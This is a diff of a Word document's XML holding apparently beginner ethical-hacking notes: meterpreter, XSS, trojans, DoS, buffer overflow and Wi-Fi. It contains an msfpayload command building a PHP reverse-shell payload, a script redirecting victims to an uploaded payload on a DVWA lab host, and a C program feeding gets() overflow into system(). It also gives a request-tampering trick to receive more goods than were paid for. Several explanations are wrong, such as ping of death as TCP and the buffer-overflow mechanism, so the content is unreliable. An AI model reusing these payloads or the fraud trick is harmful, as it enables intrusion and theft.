-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>msfpayload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>reverse_tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lhost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lport</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=port R &gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>filename.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
         <w:t>{using payload}</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>note</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> that that the system is going to say </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msfpayload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> is deprecated but it still works.</w:t>
+      <w:r>
+        <w:t>note that that the system is going to say msfpayload is deprecated but it still works.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11857,53 +10097,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>script</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>window.location</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=</w:t>
+        <w:t>&lt;script&gt; window.location=</w:t>
       </w:r>
       <w:hyperlink w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>http://ipofserver(192.168.1.107 in my case)/</w:t>
+          <w:t>http://ipofserver(192.168.1.107 in my case)/dvwa/hackable/uploads/filename.php</w:t>
         </w:r>
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>dvwa</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>/hackable/uploads/</w:t>
-        </w:r>
-        <w:proofErr w:type="spellStart"/>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>filename.php</w:t>
-        </w:r>
-        <w:proofErr w:type="spellEnd"/>
       </w:hyperlink>
       <w:r>
         <w:t>&lt;script&gt;</w:t>
@@ -11998,13 +10200,8 @@
           <w:numId w:val="28"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>http</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Trojan: Through https and http.</w:t>
+      <w:r>
+        <w:t>http Trojan: Through https and http.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12027,13 +10224,8 @@
           <w:numId w:val="28"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>: Not a Trojan but acts like a Trojan.</w:t>
+      <w:r>
+        <w:t>Netcat: Not a Trojan but acts like a Trojan.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -12071,7 +10263,7 @@
             <wp:cNvGraphicFramePr/>
             <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/diagram">
-                <dgm:relIds xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:dm="rId122" r:lo="rId123" r:qs="rId124" r:cs="rId125"/>
+                <dgm:relIds xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:dm="rId123" r:lo="rId124" r:qs="rId125" r:cs="rId126"/>
               </a:graphicData>
             </a:graphic>
           </wp:inline>
@@ -12141,13 +10333,8 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Polymorhicuiws</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>: This encrypts itself. Basically this encrypts the programs again and again so that it does not work anymore.</w:t>
+      <w:r>
+        <w:t>Polymorhicuiws: This encrypts itself. Basically this encrypts the programs again and again so that it does not work anymore.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12162,13 +10349,8 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Cavity Virus: Empties a space on memory leaving a void. This deletes randomly some part of the memory leading to loss of files and programs stop </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>working .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Cavity Virus: Empties a space on memory leaving a void. This deletes randomly some part of the memory leading to loss of files and programs stop working .</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12435,7 +10617,7 @@
       <w:r>
         <w:t xml:space="preserve">Obviously there is so much to learn in everything so take a look at the tutorials point website: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId127" w:history="1">
+      <w:hyperlink r:id="rId128" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -12445,11 +10627,9 @@
       </w:hyperlink>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>Tools :</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -12476,21 +10656,8 @@
           <w:numId w:val="31"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Prorat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">: It’s a </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>RAT{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>Remote access Trojan}. Used for getting a remote access to a target system.</w:t>
+      <w:r>
+        <w:t>Prorat: It’s a RAT{Remote access Trojan}. Used for getting a remote access to a target system.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -12515,17 +10682,7 @@
         <w:t xml:space="preserve"> main aim is to stop your server from responding to actual </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">request from the users. So this will cause a damage to your business. Ex-Suppose if you’re </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>a</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> online ecommerce site. The attacker can send a huge amount of requests to your server overwhelming it so that it can’t respond to any of the actual request from your users. This will obviously cause a damage to your business.</w:t>
+        <w:t>request from the users. So this will cause a damage to your business. Ex-Suppose if you’re a online ecommerce site. The attacker can send a huge amount of requests to your server overwhelming it so that it can’t respond to any of the actual request from your users. This will obviously cause a damage to your business.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -12574,21 +10731,8 @@
           <w:numId w:val="32"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Fraggle</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">: Same as </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>smurf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> but instead TCP it sends only UDP packets.</w:t>
+      <w:r>
+        <w:t>Fraggle: Same as smurf but instead TCP it sends only UDP packets.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12599,13 +10743,8 @@
           <w:numId w:val="32"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>PIngOfDeath</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>: The TCP packet can be a maximum of 64 kilobyte. Packet size larger 64k are sent, this is called ping of death.</w:t>
+      <w:r>
+        <w:t>PIngOfDeath: The TCP packet can be a maximum of 64 kilobyte. Packet size larger 64k are sent, this is called ping of death.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12633,15 +10772,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">SYN flood: we have seen the basic DOS attack. It is named as </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>syn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> flood attack. In this the handshake never actually occurs.</w:t>
+        <w:t>SYN flood: we have seen the basic DOS attack. It is named as syn flood attack. In this the handshake never actually occurs.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12653,15 +10784,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">LAND </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>flood :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Similar to SYN flood , instead of SYN packets we use ACK packets. We can say here that actually the server started the handshake.</w:t>
+        <w:t>LAND flood : Similar to SYN flood , instead of SYN packets we use ACK packets. We can say here that actually the server started the handshake.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12697,29 +10820,13 @@
         <w:t>,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>h</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ping</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>crazypinger</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> etc.</w:t>
+        <w:t xml:space="preserve"> h</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ping </w:t>
+      </w:r>
+      <w:r>
+        <w:t>and crazypinger etc.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -12753,15 +10860,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Controls the flow so that the CPU does not get overwhelmed. Since there are a variety of that are connected to the system it responsibility of the </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Buffer(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>RAM) to control the flow. If flow is not controlled it leads to grater load and stress over the CPU which is unnecessary.</w:t>
+        <w:t>Controls the flow so that the CPU does not get overwhelmed. Since there are a variety of that are connected to the system it responsibility of the Buffer(RAM) to control the flow. If flow is not controlled it leads to grater load and stress over the CPU which is unnecessary.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12785,26 +10884,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">When buffer is buffer overflows it does not know what to do. So instead it sends the overflow data to the CPU which is the master of all. The CPU does understand what </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>is it</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> looking at so it forwards it to the OS for help. Now when the OS receives the data it thinks it as a command since </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">it is received from the CPU so instead of </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>checking ,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> it will directly executes as a command.</w:t>
+        <w:t xml:space="preserve">When buffer is buffer overflows it does not know what to do. So instead it sends the overflow data to the CPU which is the master of all. The CPU does understand what is it looking at so it forwards it to the OS for help. Now when the OS receives the data it thinks it as a command since </w:t>
+      </w:r>
+      <w:r>
+        <w:t>it is received from the CPU so instead of checking , it will directly executes as a command.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -12820,34 +10903,19 @@
     <w:p/>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>Buffer.c</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>#include&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>stdio.h</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Void </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>main()</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>#include&lt;stdio.h&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Void main()</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -12857,13 +10925,8 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Char * </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>name ;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Char * name ;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -12871,163 +10934,48 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>name</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = (char *)</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>malloc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(10);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>command</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>=(char*)</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>malloc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(30);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>printf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>“Address of name is :%</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>d”,name</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>printf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>“address of command is:%</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>d”,command</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>printf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>“Difference between addresses:%d”, command –name);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>printf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>“Enter your name :”);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>gets(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>name);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>printf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>“hello! %s\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>n”</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>,name</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>system(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>command);</w:t>
+      <w:r>
+        <w:t>name = (char *)malloc(10);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>command=(char*)malloc(30);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“Address of name is :%d”,name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“address of command is:%d”,command);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“Difference between addresses:%d”, command –name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“Enter your name :”);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>gets(name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>printf(“hello! %s\n”,name);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>system(command);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13044,23 +10992,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Now if you we any entry that is less than the difference of address if works normally but if you have given and entry larger than the difference the extra will be going into </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>command .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>so</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> when the system(command) is executed it will consider the extra as a command and executes it.</w:t>
+        <w:t>Now if you we any entry that is less than the difference of address if works normally but if you have given and entry larger than the difference the extra will be going into command . so when the system(command) is executed it will consider the extra as a command and executes it.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -13075,54 +11007,19 @@
       <w:r>
         <w:t xml:space="preserve"> There is every possibility that we can tamper with the requests over the data. We can use tools like </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>tamperdata</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> or </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>tampermonkey</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> tamper with the requests.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Ex: If you are ordering some product on an online store we can choose how much quantity we need. There is a vulnerability here we can use </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tamperdata</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> while making a payment. So we can order a single piece but when tampered we can change the quantity of in the order. The end result of this is you will only for one piece but your order contains a delivery for a specified number of yours.</w:t>
+        <w:t xml:space="preserve">tamperdata or tampermonkey </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to tamper with the requests.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Ex: If you are ordering some product on an online store we can choose how much quantity we need. There is a vulnerability here we can use tamperdata while making a payment. So we can order a single piece but when tampered we can change the quantity of in the order. The end result of this is you will only for one piece but your order contains a delivery for a specified number of yours.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13138,27 +11035,14 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>WIFI(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>801.11)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">We have different </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">(s) based on the </w:t>
+        <w:t>WIFI(801.11)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">We have different wifi(s) based on the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13232,15 +11116,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Any </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> device can act as either an </w:t>
+        <w:t xml:space="preserve">Any wifi device can act as either an </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13254,15 +11130,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Frequency is inversely proportional to distance. This means if </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>your is</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> running on higher frequency the distance it travels is very less. So if we want the signal to penetrate to a larger distance use lower frequencies.</w:t>
+        <w:t>Frequency is inversely proportional to distance. This means if your is running on higher frequency the distance it travels is very less. So if we want the signal to penetrate to a larger distance use lower frequencies.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13281,31 +11149,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">When there are a lot of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">(s) in a single room there is a possibility that they may overlap each other. Now a device accepting the signal gets confused as to which access point it needs to access. To eliminate this we </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> with different channels. This is similar to the channels in your T.V, where we use channels to differentiate the network. In this similar fashioned way we use </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>wifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> on different channels when there is a possibility of overlapping to differentiate between them.</w:t>
+        <w:t>When there are a lot of wifi(s) in a single room there is a possibility that they may overlap each other. Now a device accepting the signal gets confused as to which access point it needs to access. To eliminate this we wifi with different channels. This is similar to the channels in your T.V, where we use channels to differentiate the network. In this similar fashioned way we use wifi on different channels when there is a possibility of overlapping to differentiate between them.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13331,7 +11175,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId128" cstate="print">
+                    <a:blip r:embed="rId129" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -13384,7 +11228,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId129">
+                    <a:blip r:embed="rId130">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -13423,20 +11267,12 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Wifi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Security:</w:t>
+        <w:t>Wifi Security:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13451,23 +11287,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>MAC binding /</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ACL :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> This is similar to mac filtering in present scenario, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i.e</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
